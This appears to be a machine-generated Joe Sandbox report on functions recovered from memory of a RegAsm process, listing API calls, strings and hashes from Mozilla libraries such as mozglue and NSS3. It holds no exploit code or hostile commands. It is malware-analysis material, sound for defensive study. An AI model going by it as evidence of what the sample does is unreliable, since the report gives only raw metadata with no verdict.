Instruction ID: 389af41416f8bc81e27ad9ef644d504658a9f4fdfedda8f7e77610cb42774698
Opcode Fuzzy Hash: ee7f4ee2c856c039d42260380b6e873699ba64e9a2bcf25d5e02a7a58eaec8b5
Instruction Fuzzy Hash: 32F1B471E00319AFEB109F65CD89B9AB7B8FF49705F5041A8E905A7640DB74EE90CF90

Function 6C76BB80 Relevance: 38.9, APIs: 17, Strings: 5, Instructions: 388stringCOMMON

Download Yara Rule

APIs

strchr.VCRUNTIME140(00000000,0000002E), ref: 6C76BC5A
strchr.VCRUNTIME140(00000001,0000002E), ref: 6C76BC6E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(accelerator.dll,?), ref: 6C76BC9E
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C76BE33
VerSetConditionMask.NTDLL ref: 6C76BE65
VerSetConditionMask.NTDLL ref: 6C76BE71
VerSetConditionMask.NTDLL ref: 6C76BE7D
VerSetConditionMask.NTDLL ref: 6C76BE89
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C76BE97
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C76BEE4
VerSetConditionMask.NTDLL ref: 6C76BF15
VerSetConditionMask.NTDLL ref: 6C76BF21
VerSetConditionMask.NTDLL ref: 6C76BF2D
VerSetConditionMask.NTDLL ref: 6C76BF39
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C76BF47

Part of subcall function 6C7AAAE0: GetCurrentThreadId.KERNEL32 ref: 6C7AAAF8
Part of subcall function 6C7AAAE0: EnterCriticalSection.KERNEL32(6C7CF770,?,6C76BF9F), ref: 6C7AAB08
Part of subcall function 6C7AAAE0: LeaveCriticalSection.KERNEL32(6C7CF770,?,?,?,?,?,?,?,?,6C76BF9F), ref: 6C7AAB6B

free.MOZGLUE(00000000), ref: 6C76BFF0
_strtoui64.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000010), ref: 6C76C014

Part of subcall function 6C7AAC20: CreateFileW.KERNEL32 ref: 6C7AAC52
Part of subcall function 6C7AAC20: CreateFileMappingW.KERNEL32 ref: 6C7AAC7D
Part of subcall function 6C7AAC20: GetSystemInfo.KERNEL32 ref: 6C7AAC98
Part of subcall function 6C7AAC20: MapViewOfFile.KERNEL32 ref: 6C7AACB0
Part of subcall function 6C7AAC20: GetSystemInfo.KERNEL32 ref: 6C7AACCD
Part of subcall function 6C7AAC20: MapViewOfFile.KERNEL32 ref: 6C7AAD05
Part of subcall function 6C7AAC20: UnmapViewOfFile.KERNEL32 ref: 6C7AAD1C
Part of subcall function 6C7AAC20: CloseHandle.KERNEL32 ref: 6C7AAD28
Part of subcall function 6C7AAC20: UnmapViewOfFile.KERNEL32 ref: 6C7AAD37
Part of subcall function 6C7AAC20: CloseHandle.KERNEL32 ref: 6C7AAD43

Part of subcall function 6C7AAE70: GetCurrentThreadId.KERNEL32 ref: 6C7AAE85
Part of subcall function 6C7AAE70: EnterCriticalSection.KERNEL32(6C7CF770,?,6C76C034), ref: 6C7AAE96
Part of subcall function 6C7AAE70: LeaveCriticalSection.KERNEL32(6C7CF770,?,?,?,?,6C76C034), ref: 6C7AAEBD

Strings

0{l, xrefs: 6C76BC93
LdrLoadDll: Ignoring the REDIRECT_TO_NOOP_ENTRYPOINT flag, xrefs: 6C76BF5B
accelerator.dll, xrefs: 6C76BC8E, 6C76BC9D
LdrLoadDll: Blocking load of '%s' -- see http://www.mozilla.com/en-US/blocklist/, xrefs: 6C76BDDD
LdrLoadDll: Blocking load of '%s' (SearchPathW didn't find it?), xrefs: 6C76BFCF

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ConditionMask$File$CriticalInfoSectionView$CloseCreateCurrentEnterHandleLeaveSystemThreadUnmapVerifyVersionmemsetstrchr$Mapping_strtoui64freestrcmp
String ID: 0{l$LdrLoadDll: Blocking load of '%s' (SearchPathW didn't find it?)$LdrLoadDll: Blocking load of '%s' -- see http://www.mozilla.com/en-US/blocklist/$LdrLoadDll: Ignoring the REDIRECT_TO_NOOP_ENTRYPOINT flag$accelerator.dll
API String ID: 3889411031-1257686697
Opcode ID: 09b300b0d0895fe59a952bea73bdcc5a0d4ed4b2a49fee70c6ac4cc7f00a4f76
Instruction ID: c32c10efc9664caf788f42f7a8917713ecc9df95d6dc69a2f416b56c906b310a
Opcode Fuzzy Hash: 09b300b0d0895fe59a952bea73bdcc5a0d4ed4b2a49fee70c6ac4cc7f00a4f76
Instruction Fuzzy Hash: B4E10B71A043019FE7109F25CA85B9A77F5EF86318F04892DFC8587E80DB74B949DB91

Function 6C78F6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C78945E
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789470
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789482
Part of subcall function 6C789420: __Init_thread_footer.LIBCMT ref: 6C78949F

GetCurrentThreadId.KERNEL32 ref: 6C78F70E
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C78F8F9

Part of subcall function 6C756390: GetCurrentThreadId.KERNEL32 ref: 6C7563D0
Part of subcall function 6C756390: AcquireSRWLockExclusive.KERNEL32 ref: 6C7563DF
Part of subcall function 6C756390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C75640E

ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78F93A
GetCurrentThreadId.KERNEL32 ref: 6C78F98A
GetCurrentThreadId.KERNEL32 ref: 6C78F990
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C78F994
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C78F716

Part of subcall function 6C7894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7894EE
Part of subcall function 6C7894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C789508

Part of subcall function 6C74B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C74B5E0

GetCurrentThreadId.KERNEL32 ref: 6C78F739
AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78F746
GetCurrentThreadId.KERNEL32 ref: 6C78F793
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C7C385B,00000002,?,?,?,?,?), ref: 6C78F829
free.MOZGLUE(?,?,00000000,?), ref: 6C78F84C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C78F866
free.MOZGLUE(?), ref: 6C78FA0C

Part of subcall function 6C755E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C78F968), ref: 6C755E8C
Part of subcall function 6C755E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C755E9D
Part of subcall function 6C755E60: GetCurrentThreadId.KERNEL32 ref: 6C755EAB
Part of subcall function 6C755E60: GetCurrentThreadId.KERNEL32 ref: 6C755EB8
Part of subcall function 6C755E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C755ECF
Part of subcall function 6C755E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C755F27
Part of subcall function 6C755E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C755F47
Part of subcall function 6C755E60: GetCurrentProcess.KERNEL32 ref: 6C755F53
Part of subcall function 6C755E60: GetCurrentThread.KERNEL32 ref: 6C755F5C
Part of subcall function 6C755E60: GetCurrentProcess.KERNEL32 ref: 6C755F66
Part of subcall function 6C755E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C755F7E

free.MOZGLUE(?), ref: 6C78F9C5
free.MOZGLUE(?), ref: 6C78F9DA

Strings

" attempted to re-register as ", xrefs: 6C78F858
[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C78F9A6
[D %d/%d] profiler_register_thread(%s), xrefs: 6C78F71F
Thread , xrefs: 6C78F789

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
API String ID: 882766088-1834255612
Opcode ID: a3fe60ae3e01bc5b4bfdbef3ad407934deea84b2f6d4a430a6d37df769ef3611
Instruction ID: 8098593a07aeb671f2ca3f59bb191ad6cda3cf9b44491829cc7e5bc3584d06cd
Opcode Fuzzy Hash: a3fe60ae3e01bc5b4bfdbef3ad407934deea84b2f6d4a430a6d37df769ef3611
Instruction Fuzzy Hash: 098136716016019FDB00DF25CA48AAEB7B5FF85308F40443DE9499BB12EB30E949CBA2

Function 6C754180 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 180libraryloaderCOMMON

Download Yara Rule

APIs

?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C754196
memset.VCRUNTIME140(?,00000000,00000110,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C7541F1
VerSetConditionMask.NTDLL ref: 6C754223
VerSetConditionMask.NTDLL ref: 6C75422A
VerSetConditionMask.NTDLL ref: 6C754231
VerSetConditionMask.NTDLL ref: 6C754238
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C754245
LoadLibraryW.KERNEL32(Shcore.dll,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C754263
GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 6C75427A
FreeLibrary.KERNEL32(?), ref: 6C754299
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C7542C4
VerSetConditionMask.NTDLL ref: 6C7542F6
VerSetConditionMask.NTDLL ref: 6C754302
VerSetConditionMask.NTDLL ref: 6C754309
VerSetConditionMask.NTDLL ref: 6C754310
VerSetConditionMask.NTDLL ref: 6C754317
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C754324

Strings

SetProcessDpiAwareness, xrefs: 6C754274
Shcore.dll, xrefs: 6C75425E

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ConditionMask$InfoLibraryVerifyVersionmemset$AddressDown@mozilla@@FreeLoadLockedProcWin32k
String ID: SetProcessDpiAwareness$Shcore.dll
API String ID: 3038791930-999387375
Opcode ID: befbbaac1ee7f9335674b09573150ebbfe2edb322c5bb91fc5b3ae0ccaf1ac85
Instruction ID: 76631263c18a8c1d53f28650053c1e0400cc6d6df8a0f3072de9c38005aa5d01
Opcode Fuzzy Hash: befbbaac1ee7f9335674b09573150ebbfe2edb322c5bb91fc5b3ae0ccaf1ac85
Instruction Fuzzy Hash: 8051E471A402256BEB105B748E49BAA777CEF86B14F418528F905AB6C0CF749E608B90

Function 6C78EE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C78945E
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789470
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789482
Part of subcall function 6C789420: __Init_thread_footer.LIBCMT ref: 6C78949F

GetCurrentThreadId.KERNEL32 ref: 6C78EE60
AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78EE6D
ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78EE92
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C78EEA5
CloseHandle.KERNEL32(?), ref: 6C78EEB4
free.MOZGLUE(00000000), ref: 6C78EEBB
GetCurrentThreadId.KERNEL32 ref: 6C78EEC7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C78EECF

Part of subcall function 6C78DE60: GetCurrentThreadId.KERNEL32 ref: 6C78DE73
Part of subcall function 6C78DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C7BFEF3,?,?,?,?,?,?,00000000), ref: 6C78DE7B
Part of subcall function 6C78DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000), ref: 6C78DEB8
Part of subcall function 6C78DE60: free.MOZGLUE(00000000), ref: 6C78DEFE
Part of subcall function 6C78DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C78DF38

Part of subcall function 6C77CBE8: GetCurrentProcess.KERNEL32(?,6C7431A7), ref: 6C77CBF1
Part of subcall function 6C77CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7431A7), ref: 6C77CBFA

GetCurrentThreadId.KERNEL32 ref: 6C78EF1E
AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78EF2B
ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78EF59
GetCurrentThreadId.KERNEL32 ref: 6C78EFB0
AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78EFBD
ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78EFE1
GetCurrentThreadId.KERNEL32 ref: 6C78EFF8
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C78F000

Part of subcall function 6C7894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7894EE
Part of subcall function 6C7894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C789508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C78F02F

Part of subcall function 6C78F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C78F09B
Part of subcall function 6C78F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C78F0AC
Part of subcall function 6C78F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C78F0BE

Strings

[I %d/%d] profiler_stop, xrefs: 6C78EED7
[I %d/%d] profiler_pause, xrefs: 6C78F008

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
API String ID: 16519850-1833026159
Opcode ID: b2d4987e07c82f97cbda9d923ab48f0f19ba03e7aa1fc7512da7d2d570b4304f
Instruction ID: 2a11baaf02e235496d5a5a1d14f098db6aeb67ae027e044f286b828bae52be8f
Opcode Fuzzy Hash: b2d4987e07c82f97cbda9d923ab48f0f19ba03e7aa1fc7512da7d2d570b4304f
Instruction Fuzzy Hash: FE51E3357012169FEB005BA4D60C7A677B8EB46329F10053AFA2583B41DB796B44CBA6

Function 6C77D010 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 215COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C7CE804), ref: 6C77D047
GetSystemInfo.KERNEL32(?), ref: 6C77D093
__Init_thread_footer.LIBCMT ref: 6C77D0A6
GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C7CE810,00000040), ref: 6C77D0D0
InitializeCriticalSectionAndSpinCount.KERNEL32(6C7CE7B8,00001388), ref: 6C77D147
InitializeCriticalSectionAndSpinCount.KERNEL32(6C7CE744,00001388), ref: 6C77D162
InitializeCriticalSectionAndSpinCount.KERNEL32(6C7CE784,00001388), ref: 6C77D18D
InitializeCriticalSectionAndSpinCount.KERNEL32(6C7CE7DC,00001388), ref: 6C77D1B1

Strings

<jemalloc>, xrefs: 6C77D268, 6C77D311
Compile-time page size does not divide the runtime one., xrefs: 6C77D26D
MOZ_CRASH(), xrefs: 6C77D277
: (malloc) Unsupported character in malloc options: ', xrefs: 6C77D322
MALLOC_OPTIONS, xrefs: 6C77D0CB

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
API String ID: 2957312145-326518326
Opcode ID: 3676c68fd1a63ffba9b454d7f105a918396d90c8f73a38011ae1d50fd216bc7a
Instruction ID: d6521fd7c3c9e620990ae21b52f14bc6fa11a62ba1ab60541e25423d82ae2c1d
Opcode Fuzzy Hash: 3676c68fd1a63ffba9b454d7f105a918396d90c8f73a38011ae1d50fd216bc7a
Instruction Fuzzy Hash: A781F470B0024E8FEF208F79CA9ABA937F4EB56304F104539E80197B80D7759615CBE6

Function 6C8A6CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C8A6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C8A6943
Part of subcall function 6C8A6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C8A6957
Part of subcall function 6C8A6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C8A6972
Part of subcall function 6C8A6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C8A6983
Part of subcall function 6C8A6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C8A69AA
Part of subcall function 6C8A6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C8A69BE
Part of subcall function 6C8A6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C8A69D2
Part of subcall function 6C8A6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C8A69DF
Part of subcall function 6C8A6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C8A6A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C8A6D8C
free.MOZGLUE(00000000), ref: 6C8A6DC5
free.MOZGLUE(?), ref: 6C8A6DD6
free.MOZGLUE(?), ref: 6C8A6DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C8A6E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C8A6E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C8A6E72
free.MOZGLUE(?), ref: 6C8A6EA7
free.MOZGLUE(?), ref: 6C8A6EC4
free.MOZGLUE(?), ref: 6C8A6ED5
free.MOZGLUE(00000000), ref: 6C8A6EE3
free.MOZGLUE(?), ref: 6C8A6EF4
free.MOZGLUE(?), ref: 6C8A6F08
free.MOZGLUE(00000000), ref: 6C8A6F35
free.MOZGLUE(?), ref: 6C8A6F44
free.MOZGLUE(?), ref: 6C8A6F5B
free.MOZGLUE(00000000), ref: 6C8A6F65

Part of subcall function 6C8A6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C8A781D,00000000,6C89BE2C,?,6C8A6B1D,?,?,?,?,00000000,00000000,6C8A781D), ref: 6C8A6C40
Part of subcall function 6C8A6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C8A781D,?,6C89BE2C,?), ref: 6C8A6C58
Part of subcall function 6C8A6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C8A781D), ref: 6C8A6C6F
Part of subcall function 6C8A6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C8A6C84
Part of subcall function 6C8A6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C8A6C96
Part of subcall function 6C8A6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C8A6CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C8A6F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C8A6FC5
PK11_GetInternalKeySlot.NSS3 ref: 6C8A6FF4

Memory Dump Source

Source File: 00000003.00000002.2272879099.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true

Associated: 00000003.00000002.2271733381.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292436423.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292519358.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292589475.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292635391.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c7e0000_RegAsm.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID:
API String ID: 1304971872-0
Opcode ID: 98534ddf741d60fa03027c7b22feec30de5652bf3b8fd3d0e50de2a11b293aa5
Instruction ID: c3bcac96dda11efec816f1af5c340ff21029703372b8a95ff09573b23ecf90ae
Opcode Fuzzy Hash: 98534ddf741d60fa03027c7b22feec30de5652bf3b8fd3d0e50de2a11b293aa5
Instruction Fuzzy Hash: 49B174B1E012099FDF20CBEDDE44B9EBBB4AF09349F240825E815E7644E735E916CB61

Function 6C757FD0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6C758007
moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6C75801D

Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26

memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6C75802B
K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6C75803D
moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6C75808D

Part of subcall function 6C75CA10: mozalloc_abort.MOZGLUE(?), ref: 6C75CAA2

memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6C75809B
GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C7580B9
moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C7580DF
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7580ED
wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7580FB
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C75810D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C758133
free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6C758149
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6C758167
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6C75817C
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C758199

Strings

0>xl, xrefs: 6C75811E

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
